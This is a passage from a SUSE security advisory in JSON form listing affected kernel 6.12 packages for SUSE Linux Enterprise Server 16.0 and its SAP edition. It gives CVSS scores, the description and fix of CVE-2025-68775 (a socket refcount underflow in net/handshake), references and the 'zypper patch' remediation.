"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68773"
},
{
"cve": "CVE-2025-68775",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68775"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/handshake: duplicate handshake cancellations leak socket\n\nWhen a handshake request is cancelled it is removed from the\nhandshake_net-\u003ehn_requests list, but it is still present in the\nhandshake_rhashtbl until it is destroyed.\n\nIf a second cancellation request arrives for the same handshake request,\nthen remove_pending() will return false... and assuming\nHANDSHAKE_F_REQ_COMPLETED isn\u0027t set in req-\u003ehr_flags, we\u0027ll continue\nprocessing through the out_true label, where we put another reference on\nthe sock and a refcount underflow occurs.\n\nThis can happen for example if a handshake times out - particularly if\nthe SUNRPC client sends the AUTH_TLS probe to the server but doesn\u0027t\nfollow it up with the ClientHello due to a problem with tlshd. When the\ntimeout is hit on the server, the server will send a FIN, which triggers\na cancellation request via xs_reset_transport(). When the timeout is\nhit on the client, another cancellation request happens via\nxs_tls_handshake_sync().\n\nAdd a test_and_set_bit(HANDSHAKE_F_REQ_COMPLETED) in the pending cancel\npath so duplicate cancels can be detected.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68775",
"url": "https://www.suse.com/security/cve/CVE-2025-68775"
},
{
"category": "external",
"summary": "SUSE Bug 1256665 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "external",
"summary": "SUSE Bug 1256666 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256666"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
